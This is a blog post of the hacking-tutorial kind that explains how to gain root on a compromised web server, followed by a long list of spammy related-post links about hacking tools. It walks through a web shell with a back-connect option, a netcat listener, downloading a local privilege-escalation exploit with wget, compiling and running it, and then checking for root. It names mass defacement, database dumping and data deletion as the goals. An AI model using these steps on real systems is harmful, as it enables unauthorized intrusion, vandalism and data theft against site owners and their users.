Pages

Friday, January 19, 2024

HOW TO ROOT A SERVER? – SERVER ROOTING

Servers serve the requests made by the users to the web pages, it acts as a helping hand who serves the requested meal for you. Here I am sharing how to root a server. Root is the Administrator of all server. If someone got root access to it, he can do anything with a server like delete and copy anything on the server, can deface all the websites (massive deface ).
We can't talk about root on windows. That enough for a beginner because if I talk about the root I need another book. So, I guess now we know the importance of root access and why we try to get root.

HOW TO ROOT A SERVER?

There are 3 ways to get ROOT on the server :
1 – With local Root.
2 – With SQL by reading the same important files on it root password.
3 – With exploit on software (Buffer Overflow).
In this post, we will explain local Root. I will explain the other ways soon in some other post.
OK, let's back to work.
After Uploading your shell on the server and getting the local root you will do a back connect and run the local root to Get root. This is a small idea of how it works in the next step you will see how to
find local root and run it to get root access.

HOW TO SEARCH LOCAL ROOT?

First of all we you need to know what version of Kernel.
You can know that from your shell, for example, this version is 2.6.18 – 2012
Go to EXECUTE on your shell and write  "uname -a". You will get the same result, by the way.
Now how to find the local root.
You can use various websites like Exploit-db, packetstormsecurity, vfocus, injector, etc who provides these local roots. One more thing to notice is, that there exist two types of local roots :
1. Local.C: which are not ready.
2. Local: ready to use.

HOW TO GET ROOT ACCESS?

First, you need a shell with a Back Connect option like this :
Enter your "Public IP Address" in SERVER, the port you want to connect on and leave it, Perl, this time, and Finally connect.
So now you must receive the back connect with a Tool named netcat u can download it from the
net. After that open your terminal if you are under Linux or CMD  if you are under Windows. I will explain only Linux, and for Windows, its all the same.
After that Follow the steps :
1- Press nc -vlp 433
2- Wget [the link of the local-Root.zip]
3 – unzip local-Root.zip

4 – chmod 777 local.c

5 – now to change the local-root from local.c > local
gcc local.c -o local Then you will find local.c transformed to local

6 – chmod 777 local

7 – ./local to local rootwork

8 – su
then see your id uid=0(root) gid=0(root) groups=0(root)


Getting UID=0 means, u had got root privileges and hence can do a variety of stuff on the remote server say Mass deface, dump database, redirect sites, change content, etc etc.
AFTER THE ROOT 
As server gets rooted, you're able to do the many things with it like I mentioned above. Such as, withdrawal of domains, massive deface and also deletion of the data completely.
Related posts
  1. Hacking Tools For Windows 7
  2. Hack Apps
  3. Hacking Tools For Windows
  4. Pentest Tools Kali Linux
  5. Hacker Tools For Pc
  6. New Hacker Tools
  7. Pentest Tools For Windows
  8. Termux Hacking Tools 2019
  9. Pentest Tools Nmap
  10. Pentest Tools List
  11. New Hacker Tools
  12. Hacker Tools 2020
  13. Nsa Hack Tools Download
  14. Top Pentest Tools
  15. Hacking Tools 2020
  16. Hack Tool Apk
  17. World No 1 Hacker Software
  18. Hak5 Tools
  19. Game Hacking
  20. Hack Website Online Tool
  21. Hacking Apps
  22. Hacking Tools For Windows
  23. Hacking Tools For Mac
  24. Pentest Tools Bluekeep
  25. Hacking Tools Download
  26. Pentest Tools Url Fuzzer
  27. Pentest Tools Find Subdomains
  28. Hacker Tools For Windows
  29. Game Hacking
  30. Hacker Tools Software
  31. Hack Tools
  32. Hack Tools Online
  33. Pentest Tools Github
  34. Pentest Tools Windows
  35. Hacker Search Tools
  36. Best Hacking Tools 2020
  37. Hacker Hardware Tools
  38. Hack Tools For Pc
  39. Best Hacking Tools 2020
  40. Hack Tool Apk No Root
  41. Hacker Tools Free
  42. Pentest Tools Find Subdomains
  43. Termux Hacking Tools 2019
  44. Hacker Tools For Windows
  45. Hack Tools Online
  46. World No 1 Hacker Software
  47. Hacking Apps
  48. Bluetooth Hacking Tools Kali
  49. Termux Hacking Tools 2019
  50. Hacker Tools Linux
  51. Hacking Tools Software
  52. Hacking Tools For Windows
  53. How To Make Hacking Tools
  54. Hacker Tools For Ios
  55. Github Hacking Tools
  56. Pentest Tools Url Fuzzer
  57. Hacking Tools
  58. Beginner Hacker Tools
  59. Hacker Tools
  60. Pentest Tools For Windows
  61. Pentest Tools Nmap
  62. Hacker Tools For Mac
  63. Hack Tools Pc
  64. Free Pentest Tools For Windows
  65. Hacking Tools Free Download
  66. Android Hack Tools Github
  67. Pentest Tools Android
  68. Hacker Techniques Tools And Incident Handling
  69. Hacker Tools For Pc
  70. Hacker Tools For Ios
  71. Pentest Tools Open Source
  72. Hacking App
  73. Hacker Techniques Tools And Incident Handling
  74. Pentest Tools Github
  75. Hacker Tools Mac
  76. Hacker Tools Mac
  77. Hacker Tools
  78. Hacking Tools For Games
  79. Hacker Tools
  80. Pentest Tools Framework

No comments:

Post a Comment